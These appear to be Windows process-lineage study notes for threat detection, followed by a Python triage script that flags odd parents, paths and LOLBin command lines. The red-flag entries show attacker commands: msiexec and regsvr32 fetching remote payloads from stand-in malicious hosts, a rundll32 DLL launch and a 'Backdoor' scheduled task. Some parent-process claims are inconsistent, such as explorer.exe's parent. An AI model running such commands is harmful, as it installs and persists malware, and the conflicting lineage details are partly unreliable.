# 🔹 Windows System Processes

### **🔹 Windows System Processes**

#### 1️⃣ **System Idle Process (PID 0)**

* **Parent:** None (it is created by the Windows kernel)
* **Child:** None (does not spawn any processes)
* **Purpose:** Represents unused CPU resources; does not execute code.

#### 2️⃣ **System Process (PID 4)**

* **Parent:** None (created by the Windows Kernel)
* **Child:** Handles low-level kernel processes like drivers.
* **Purpose:** Manages hardware interactions and kernel operations.

#### 3️⃣ **smss.exe (Session Manager Subsystem)**

* **Parent:** `System (PID 4)`
* **Child:** `winlogon.exe`, `csrss.exe`
* **Purpose:** Manages system sessions, initializes the registry, and starts critical system processes.

#### 4️⃣ **csrss.exe (Client/Server Runtime Subsystem)**

* **Parent:** `smss.exe`
* **Child:** None
* **Purpose:** Handles console windows, GUI elements, and thread creation.

#### 5️⃣ **wininit.exe (Windows Initialization Process)**

* **Parent:** `smss.exe`
* **Child:** `services.exe`, `lsass.exe`
* **Purpose:** Initializes system services during boot-up.

#### 6️⃣ **services.exe (Service Control Manager)**

* **Parent:** `wininit.exe`
* **Child:** Various Windows services (`svchost.exe`, `spoolsv.exe`, etc.)
* **Purpose:** Manages Windows services.

#### 7️⃣ **lsass.exe (Local Security Authority Subsystem)**

* **Parent:** `wininit.exe`
* **Child:** None (but can be targeted for credential dumping)
* **Purpose:** Manages authentication and security policies.

#### 8️⃣ **explorer.exe (Windows Explorer)**

* **Parent:** `winlogon.exe`
* **Child:** `cmd.exe`, `notepad.exe`, `chrome.exe` (user-launched apps)
* **Purpose:** Provides the desktop, taskbar, and file browsing interface.

#### 9️⃣ **cmd.exe (Command Prompt)**

* **Parent:** `explorer.exe` (when opened by a user)
* **Child:** `powershell.exe`, `whoami.exe`, etc.
* **Purpose:** Runs command-line instructions.

#### 🔟 **powershell.exe**

* **Parent:** `cmd.exe` or `explorer.exe`
* **Child:** Various scripts or executables.
* **Purpose:** Executes PowerShell scripts and commands.

#### 1️⃣1️⃣ **rundll32.exe**

* **Parent:** `explorer.exe`, `cmd.exe`
* **Child:** Can execute malicious DLLs if misused.
* **Purpose:** Loads and executes DLL files.

#### 1️⃣2️⃣ **wmiprvse.exe (WMI Provider Host)**

* **Parent:** `services.exe`
* **Child:** Various WMI queries
* **Purpose:** Executes WMI scripts for system management.

#### 1️⃣3️⃣ **taskhost.exe / taskhostw.exe**

* **Parent:** `services.exe`
* **Child:** Hosts dynamic Windows services.
* **Purpose:** Executes DLL-based services.

### **🔹 Additional Critical Windows Processes**

#### **1️⃣ winlogon.exe (Windows Logon Application)**

* **Parent:** `smss.exe`
* **Child:** `userinit.exe`, `explorer.exe`
* **Purpose:** Handles user login, logoff, and lock screen.
* **Red Flags:** Malware can inject into `winlogon.exe` for persistence (e.g., `Winlogon Registry Notification` abuse).

***

#### **2️⃣ userinit.exe**

* **Parent:** `winlogon.exe`
* **Child:** `explorer.exe`, `cmd.exe`
* **Purpose:** Runs after login, initializes user environment.
* **Red Flags:** If replaced by malware, it can execute malicious scripts on login.

***

#### **3️⃣ explorer.exe**

* **Parent:** `userinit.exe`
* **Child:** User-launched apps (`chrome.exe`, `notepad.exe`, etc.)
* **Purpose:** Handles the desktop, taskbar, and file browsing.
* **Red Flags:** If `explorer.exe` spawns `cmd.exe` or `powershell.exe`, it could indicate script execution or malware activity.

***

#### **4️⃣ msiexec.exe (Windows Installer)**

* **Parent:** `explorer.exe` or `services.exe`
* **Child:** Can spawn installation processes.
* **Purpose:** Handles the installation of `.msi` files.
* **Red Flags:** Attackers can use `msiexec.exe` for **LOLBin (Living Off the Land Binaries)** execution (`msiexec.exe /q /i http://malicious-url.com/malware.msi`).

***

#### **5️⃣ wscript.exe & cscript.exe (Windows Scripting Hosts)**

* **Parent:** `explorer.exe`, `cmd.exe`
* **Child:** Script execution (`.vbs`, `.js`).
* **Purpose:** Executes VBScript (`wscript.exe`) and command-line scripts (`cscript.exe`).
* **Red Flags:** Often used by malware for fileless attacks.

***

#### **6️⃣ rundll32.exe**

* **Parent:** `explorer.exe`, `cmd.exe`
* **Child:** Loads DLLs.
* **Purpose:** Executes functions in DLLs.
* **Red Flags:** Attackers use it to execute malware-laden DLLs (`rundll32.exe malware.dll, Start`).

***

#### **7️⃣ regsvr32.exe (Registry Server)**

* **Parent:** `cmd.exe`, `explorer.exe`
* **Child:** Registers/Unregisters COM DLLs.
* **Purpose:** Registers system DLLs.
* **Red Flags:** Used in **Squiblydoo Attack** to bypass defenses (`regsvr32 /s /n /u /i:http://malicious.com/file.sct scrobj.dll`).

***

#### **8️⃣ conhost.exe (Console Window Host)**

* **Parent:** `cmd.exe`, `explorer.exe`
* **Child:** `powershell.exe`, `notepad.exe`
* **Purpose:** Provides console window support.
* **Red Flags:** If conhost is running in unusual locations (`C:\Users\Public\conhost.exe`), it might be malware.

***

#### **9️⃣ dllhost.exe (COM Surrogate)**

* **Parent:** `explorer.exe`
* **Child:** Handles DLL-based processes.
* **Purpose:** Supports COM objects execution.
* **Red Flags:** If running without an associated process, it may be malware (`dllhost.exe` used for **Process Hollowing**).

***

#### **🔟 werfault.exe (Windows Error Reporting)**

* **Parent:** `services.exe`
* **Child:** None (Handles error reporting).
* **Purpose:** Collects error reports and crash dumps.
* **Red Flags:** Attackers can **disable werfault.exe** to prevent crash reports from being logged.

***

#### **1️⃣1️⃣ consent.exe (UAC Prompt)**

* **Parent:** `winlogon.exe`
* **Child:** Elevates processes requiring Admin rights.
* **Purpose:** Handles UAC prompts.
* **Red Flags:** If bypassed, attackers can escalate privileges.

***

#### **1️⃣2️⃣ taskeng.exe (Task Scheduler Engine)**

* **Parent:** `services.exe`
* **Child:** Scheduled tasks.
* **Purpose:** Executes scheduled tasks.
* **Red Flags:** Used in **persistence** (`schtasks.exe /create /tn Backdoor /tr "C:\malware.exe"`).
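As an added example (not part of these notes, and not any vendor's tooling), the script below turns the two lists above into a triage check over a process snapshot. It validates each core boot-chain process against the parent named in the first list and applies several of the red flags from the second: an image path outside `System32`/`SysWOW64`, a LOLBin (`rundll32`, `regsvr32`, `msiexec`, `wscript`, `cscript`) whose command line references a URL, `regsvr32` loading `scrobj.dll`, and a shell spawned directly by `explorer.exe`. The snapshot is constructed test data; the `Proc`/`Finding` field names and the severity labels are my own. The expected-parent table deliberately covers only the boot chain, not every process in the lists. One caveat the lists do not state: a parent PID can refer to a process that has already exited (the per-session `smss.exe` exits after starting `csrss.exe` and `winlogon.exe`), and PIDs are reused, so a parent check should be correlated with process start times rather than trusted on its own.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Set


@dataclass
class Proc:
    """One row of a process snapshot (e.g. exported from a live host or Sysmon)."""
    pid: int
    ppid: int
    name: str
    path: str = ""
    cmdline: str = ""


@dataclass
class Finding:
    severity: str  # "HIGH", "MEDIUM" or "INFO" (labels chosen for this example)
    pid: int
    name: str
    reason: str


# Expected parent per image name, taken from the list above (boot chain only).
EXPECTED_PARENT: Dict[str, Set[str]] = {
    "smss.exe": {"system"},
    "csrss.exe": {"smss.exe"},
    "wininit.exe": {"smss.exe"},
    "winlogon.exe": {"smss.exe"},
    "services.exe": {"wininit.exe"},
    "lsass.exe": {"wininit.exe"},
    "svchost.exe": {"services.exe"},
    "spoolsv.exe": {"services.exe"},
    "userinit.exe": {"winlogon.exe"},
}

# Binaries that should only ever run from the Windows system directories.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
SYSTEM_ONLY = set(EXPECTED_PARENT) | {
    "conhost.exe", "dllhost.exe", "rundll32.exe", "regsvr32.exe",
    "msiexec.exe", "wscript.exe", "cscript.exe",
}
LOLBINS = {"rundll32.exe", "regsvr32.exe", "msiexec.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def triage(procs: List[Proc]) -> List[Finding]:
    """Apply the lineage, path and command-line checks to every process."""
    by_pid = {p.pid: p for p in procs}
    findings: List[Finding] = []
    for p in procs:
        name = p.name.lower()
        parent = by_pid.get(p.ppid)
        pname = parent.name.lower() if parent else None

        # 1. Lineage: is the parent the one the list expects?
        if name in EXPECTED_PARENT:
            if parent is None:
                findings.append(Finding("INFO", p.pid, p.name,
                    f"parent PID {p.ppid} not in snapshot (a session smss.exe exits "
                    f"after launching csrss/winlogon; PIDs are reused, check start times)"))
            elif pname not in EXPECTED_PARENT[name]:
                findings.append(Finding("HIGH", p.pid, p.name,
                    f"parent is {parent.name} (PID {parent.pid}), "
                    f"expected one of {sorted(EXPECTED_PARENT[name])}"))

        # 2. Image path: system binaries outside System32/SysWOW64 (e.g. C:\Users\Public).
        if name in SYSTEM_ONLY and p.path and not p.path.lower().startswith(SYSTEM_DIRS):
            findings.append(Finding("HIGH", p.pid, p.name,
                f"image path {p.path} is outside the Windows system directories"))

        # 3. LOLBin command lines that pull content from a URL, and the regsvr32/scrobj.dll pattern.
        if name in LOLBINS and URL_RE.search(p.cmdline):
            findings.append(Finding("HIGH", p.pid, p.name, "command line references a remote URL"))
        if name == "regsvr32.exe" and "scrobj.dll" in p.cmdline.lower():
            findings.append(Finding("HIGH", p.pid, p.name, "regsvr32 loading scrobj.dll (scriptlet execution)"))

        # 4. Shells spawned directly by explorer.exe: common for users, worth a look in context.
        if name in SHELLS and pname == "explorer.exe":
            findings.append(Finding("MEDIUM", p.pid, p.name,
                "spawned directly by explorer.exe; review its command line and children"))
    return findings


# Constructed snapshot: nine clean boot-chain rows, then four rows with planted anomalies.
SAMPLE: List[Proc] = [
    Proc(4, 0, "System"),
    Proc(368, 4, "smss.exe", r"C:\Windows\System32\smss.exe"),
    Proc(488, 368, "csrss.exe", r"C:\Windows\System32\csrss.exe"),
    Proc(556, 368, "wininit.exe", r"C:\Windows\System32\wininit.exe"),
    Proc(612, 368, "winlogon.exe", r"C:\Windows\System32\winlogon.exe"),
    Proc(680, 556, "services.exe", r"C:\Windows\System32\services.exe"),
    Proc(700, 556, "lsass.exe", r"C:\Windows\System32\lsass.exe"),
    Proc(820, 680, "svchost.exe", r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
    Proc(1500, 1480, "explorer.exe", r"C:\Windows\explorer.exe"),  # userinit.exe (1480) has exited: normal
    Proc(2980, 2900, "csrss.exe", r"C:\Windows\System32\csrss.exe"),  # session smss.exe exited: INFO only
    Proc(2400, 1500, "cmd.exe", r"C:\Windows\System32\cmd.exe"),  # shell under explorer: MEDIUM
    Proc(3004, 2400, "svchost.exe", r"C:\Users\Public\svchost.exe"),  # wrong parent and wrong path: 2x HIGH
    Proc(3100, 2400, "regsvr32.exe", r"C:\Windows\System32\regsvr32.exe",
         "regsvr32 /s /n /u /i:http://example.invalid/file.sct scrobj.dll"),  # URL + scrobj.dll: 2x HIGH
]

if __name__ == "__main__":
    for f in triage(SAMPLE):
        print(f"[{f.severity}] PID {f.pid} {f.name}: {f.reason}")
```

Running the script prints six findings for the constructed snapshot: four HIGH (the `svchost.exe` under `cmd.exe` in `C:\Users\Public`, and the `regsvr32.exe` with a URL and `scrobj.dll` on its command line), one MEDIUM for the `cmd.exe` under `explorer.exe`, and one INFO for the second `csrss.exe` whose parent has exited. On a real export, feed the rows into `Proc` and extend `EXPECTED_PARENT` with the lineage observed on a known-good build of the same host image.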

